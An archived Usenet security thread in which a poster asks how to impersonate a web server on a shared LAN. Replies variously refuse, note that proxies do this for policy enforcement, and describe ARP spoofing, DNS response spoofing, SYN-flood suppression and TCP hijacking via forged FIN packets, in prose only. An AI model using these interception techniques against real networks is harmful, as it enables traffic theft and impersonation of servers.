Web Server "Impersonating"
ed...@my-dejanews.com
runs on LAN, so that if another pc from the same LAN requests a page
from this server, my computer/program, which is on the same segment,
delivers the page instead of the web server?
Assume all computers run on the same segment. The web server must
not know that someone else, that would be my program/computer, is
answering the requests.
Someone suggested blocking the web server port 80 by isuing a SYN
flood and putting the card in promiscuos mode and scan all request
going to the server at port 80 and answering them instead while the
server was unable to respond. Is this possible ?
Is there another way ? can it be done ?
Thanks in advance for your help.
--== Sent via Deja.com http://www.deja.com/ ==--
---Share what you know. Learn what you don't.---
Mark Lambert
>
> I want to know if its possible to "impersonate" a web server that
> runs on LAN, so that if another pc from the same LAN requests a page
> from this server, my computer/program, which is on the same segment,
> delivers the page instead of the web server?
> flood and putting the card in promiscuos mode and scan all request
> going to the server at port 80 and answering them instead while the
> server was unable to respond. Is this possible ?
>
> Is there another way ? can it be done ?
Hmmm tell me, does this newsgroup *look* like alt.hacking?
I thouight it was a discussion group dedicated to protecting computers from
this sort of thing. Just because we discuss security holes does *not* mean we
exploit then ourselves.
Cant speak for the rest of the population of comp.security.unix, but _I'm_ not
going to help you ruin someones day. Go peddle your bicycle elsewhere.
The opinions expreessed herein are not necessarily those of my employer.
--
/\ The Fulcrum Consulting Group Mark Lambert - Consultant
/\O\ Professional Services For Operation Mark.L...@fulcrum.com.au
/ /\ Of A Networked Computing Environment ph: +61-3-9621-2100
/o | \ 12/10-16 Queen St, Melbourne VIC 3000, Australia fx: +61-3-9621-2724
Cam Penner
says...
> ed...@my-dejanews.com wrote:
> >
> > I want to know if its possible to "impersonate" a web server that
> > runs on LAN, so that if another pc from the same LAN requests a page
> > from this server, my computer/program, which is on the same segment,
> > delivers the page instead of the web server?
> <snip>
> > Someone suggested blocking the web server port 80 by isuing a SYN
> > flood and putting the card in promiscuos mode and scan all request
> > going to the server at port 80 and answering them instead while the
> > server was unable to respond. Is this possible ?
> >
> > Is there another way ? can it be done ?
> <snip>
>
> Hmmm tell me, does this newsgroup *look* like alt.hacking?
> I thouight it was a discussion group dedicated to protecting computers from
> this sort of thing. Just because we discuss security holes does *not* mean we
> exploit then ourselves.
If OTOH, you are developing some sort of app and need this for
development purposes, you could always put the name of the webserver in
your hosts file with the remapped address. That would redirect
everything to that address on that machine.
--
Cam
vha...@cc.helsinki.fi
Mark Lambert <ma...@fulcrum.com.au> wrote:
>ed...@my-dejanews.com wrote:
>>
>> I want to know if its possible to "impersonate" a web server that
>> runs on LAN, so that if another pc from the same LAN requests a page
>> from this server, my computer/program, which is on the same segment,
>> delivers the page instead of the web server?
><snip>
>> Someone suggested blocking the web server port 80 by isuing a SYN
>> flood and putting the card in promiscuos mode and scan all request
>> going to the server at port 80 and answering them instead while the
>> server was unable to respond. Is this possible ?
>>
>> Is there another way ? can it be done ?
><snip>
>
>Hmmm tell me, does this newsgroup *look* like alt.hacking?
>I thouight it was a discussion group dedicated to protecting computers from
>this sort of thing. Just because we discuss security holes does *not* mean we
>exploit then ourselves.
>
>going to help you ruin someones day. Go peddle your bicycle elsewhere.
>
>The opinions expreessed herein are not necessarily those of my employer.
There are commercial products which are designed to do this. The idea is
to enforce company policies: if you try to connect www.sex.com, you will
get a screen which says 'naughty boy, you are supposed to work here,
contact your boss'
Of course these products are very nasty. They can also store all email, in
user order, they store all the directories that you browse in ftp.. They
also store all cleartext accounts and passwords.
They spy everything, and present the information in an organised way.
And a really working demo version of such a program is available in the net!
It works 1-2 months. Think what you can find about your colleagues in
4 weeks...
VesA
Barry Margolin
>There are commercial products which are designed to do this. The idea is
>to enforce company policies: if you try to connect www.sex.com, you will
>get a screen which says 'naughty boy, you are supposed to work here,
>contact your boss'
These products generally run on a firewall or proxy that sits between your
LAN and the Internet. The original poster was asking about ways of
intercepting traffic within the same LAN, which is very different.
--
Barry Margolin, bar...@bbnplanet.com
GTE Internetworking, Powered by BBN, Burlington, MA
*** DON'T SEND TECHNICAL QUESTIONS DIRECTLY TO ME, post them to newsgroups.
Please DON'T copy followups to me -- I'll assume it wasn't posted to the group.
Jeroen Willems
want to monitor proper surfing practices of colleagues? In prionciple
that is possible, but then it should be known to all users that they can
be scrutinised. Otherwise the users may feel they have been entrapped.
I think a good information on company policy and a personal talk is more
effective.
Regards,
jEroen
Brian Hampson
: In article <7i2vnl$7...@alca.helsinki.fi>, <Vesa....@Helsinki.FI> wrote:
: >There are commercial products which are designed to do this. The idea is
: >to enforce company policies: if you try to connect www.sex.com, you will
: >get a screen which says 'naughty boy, you are supposed to work here,
: >contact your boss'
:
: These products generally run on a firewall or proxy that sits between your
: LAN and the Internet. The original poster was asking about ways of
: intercepting traffic within the same LAN, which is very different.
Interestingly, I ran into one that DOESN'T. Strange. I have a feeling it
works using RIP or some sort, but it destroys our router something fierce.
Barry, shoot me email if you want to know the product. Very strange
indeed.
B.
--
Please send administrative requests to ad...@ASL.CA
Brian P. Hampson ASL Analytical Service Laboratories Ltd
System Administrator, Vancouver, BC (604)253-4188
----------------- http://www.ASL.CA/ ----------------------------
I'm not speaking for the company <- They made me say that.
Le Rhinitis Seen
be invulnerable to this attack. The following document demonstrates how to
"hijack" a TCP-established connection on Telnet, but it could also
conceivably be used for other ports. The moral of this may be that https
should be used even on "protected" DMZs for fear of sniffing going on by
users of the DMZ. Of course, that's true just because of the
clear-text-ness of HTTP, let alone imitating a server.
http://www.cyberoasis.net/download/iphijack.txt
In comp.security.firewalls ed...@my-dejanews.com wrote:
> I want to know if its possible to "impersonate" a web server that
> runs on LAN, so that if another pc from the same LAN requests a page
> from this server, my computer/program, which is on the same segment,
> delivers the page instead of the web server?
> Assume all computers run on the same segment. The web server must
> not know that someone else, that would be my program/computer, is
> answering the requests.
> Someone suggested blocking the web server port 80 by isuing a SYN
> flood and putting the card in promiscuos mode and scan all request
> going to the server at port 80 and answering them instead while the
> server was unable to respond. Is this possible ?
> Is there another way ? can it be done ?
> Thanks in advance for your help.
Craig Johnston
>Barry Margolin (bar...@bbnplanet.com) wrote:
>: In article <7i2vnl$7...@alca.helsinki.fi>, <Vesa....@Helsinki.FI> wrote:
>: >There are commercial products which are designed to do this. The idea is
>: >to enforce company policies: if you try to connect www.sex.com, you will
>: >get a screen which says 'naughty boy, you are supposed to work here,
>: >contact your boss'
>:
>: These products generally run on a firewall or proxy that sits between your
>: LAN and the Internet. The original poster was asking about ways of
>: intercepting traffic within the same LAN, which is very different.
>
>Interestingly, I ran into one that DOESN'T. Strange. I have a feeling it
>works using RIP or some sort, but it destroys our router something fierce.
I've done something very similar by playing ARP games. It took some
trial and error because implementations of ARP vary in their behavior.
You basically use ARP to lie to all the local interfaces (except the
router) about the MAC address that corresponds to the webserver's IP.
Give our a made up MAC address. Then promiscuously grab packets destined for
that MAC address and either handle them yourself or rewrite the
ethernet header and forward as necessary.
Getting all the details right took some trial and error but I was
able to get something to do pretty much what I take it the poster
is asking for. It's a pretty ugly hack, IMO, and it would be much
preferable to route packets for the webserver through the intermediate
machine and have it either answer itself or forward the request to
the real webserver, depending.
--
Craig Johnston
c...@lfn.org
ed...@my-dejanews.com
Computer Network class and my teacher asked if this was possibly while
we studied the DNS protocol. Dont be defensive to every post you read.
Btw, thanks to all those that answer my question without questioning
my reasons. (sorry for bad english)
> <snip>
>
> Hmmm tell me, does this newsgroup *look* like alt.hacking?
> I thouight it was a discussion group dedicated to protecting
computers from
> this sort of thing. Just because we discuss security holes does *not*
mean we
> exploit then ourselves.
ed...@my-dejanews.com
Someone suggested me this, i dont know what you guys think:
To promiscuosly grab packets destined for the webserver, and when I
detected a DNS request for the webserver, i spoofed it answering back
to the machine which DNSed with my IP, so that machine insted of
accesing the Web Server it originally wanted, would be served by my
machine without the other two ever knowing what happened.
Is this possible ?
Btw, if you wonder why this question is about, its just a debate we
had in Computer Network class discussing the DNS protocol and security.
I just had to know the answer, so i asked the gurus :)
> You basically use ARP to lie to all the local interfaces (except the
> router) about the MAC address that corresponds to the webserver's IP.
> Give our a made up MAC address. Then promiscuously grab packets
destined for
> that MAC address and either handle them yourself or rewrite the
> ethernet header and forward as necessary.
> Craig Johnston
> c...@lfn.org
rv...@removethiscistron.nl
> Someone suggested me this, i dont know what you guys think:
> To promiscuosly grab packets destined for the webserver, and when I
> detected a DNS request for the webserver, i spoofed it answering back
> to the machine which DNSed with my IP, so that machine insted of
> accesing the Web Server it originally wanted, would be served by my
> machine without the other two ever knowing what happened.
> Is this possible ?
Your question isn't clear.
If you wanted to pretend you're a different machine, you could do it in
two ways.
The first way is detecting the request for the ip number of your webserver's
name, and replying with a spoofed dns answer, giving your ip as the webserver's
ip.
You would have to be able to sniff or predict or fake the sequence numbers
from the dns packet. A way to do this is described in one of the phrack issues,
can't remember wich one, but you can find them at www.phrack.com.
The second way would be to be on the physical segment where the webserver
is located, sniff packets destined for the webserver, and fake FIN packets
to terminate each connection made to the webserver.
Then you could continue the connection with spoofed packets from your own
host, keeping seqnumbers in mind, and sniffing the replies the remote host
sends back to your webserver.
Both ways would be hard to do, you'd have to write your own implementation
for the second way, the first way can be done with the ADM utilities.
I never got the first way to work though ;)
Robert
--
| rv...@cistron.nl - Cistron Internet Services - www.cistron.nl |
| php3/c/perl/html/c++/sed/awk/linux/sql/cgi/security |
| My statements are mine, and not necessarily cistron's. |
Clifford Eugene Smith
: Both ways would be hard to do, you'd have to write your own implementation
: for the second way, the first way can be done with the ADM utilities.
: I never got the first way to work though ;)
As a side note, this is impossible if your ISP uses encrypting routers or
switches. For instance, Georgia Tech's hubs encrypt transparently to the
MAC address of the destination. thus in this type of setting, it would be
impossible without router access
--Clifford Smith
rv...@removethiscistron.nl
That is when you're between routers, you can't decrypt what's coming over
the line, but because there's no need to change the tcp/ip stack on the
webserver or the client, tcp/ip traffic to the nearest router is business
as usual.. meaning you would still be able to do it this way...
unless ofcourse, the router has static mac adresses connected to ip addresses,
and denies forwarding of ip addresses that are not connected to the mac address
in its table. then you would have to use mac address spoofing as well..
Correct me if i'm wrong here, but i don't think encrypting routers would
be of any use to defeat ip/dns spoofing attacks. Their only use should be
the providing of an encrypted, secure way of trafficing between routers.
Export4
Interesting article......
Mike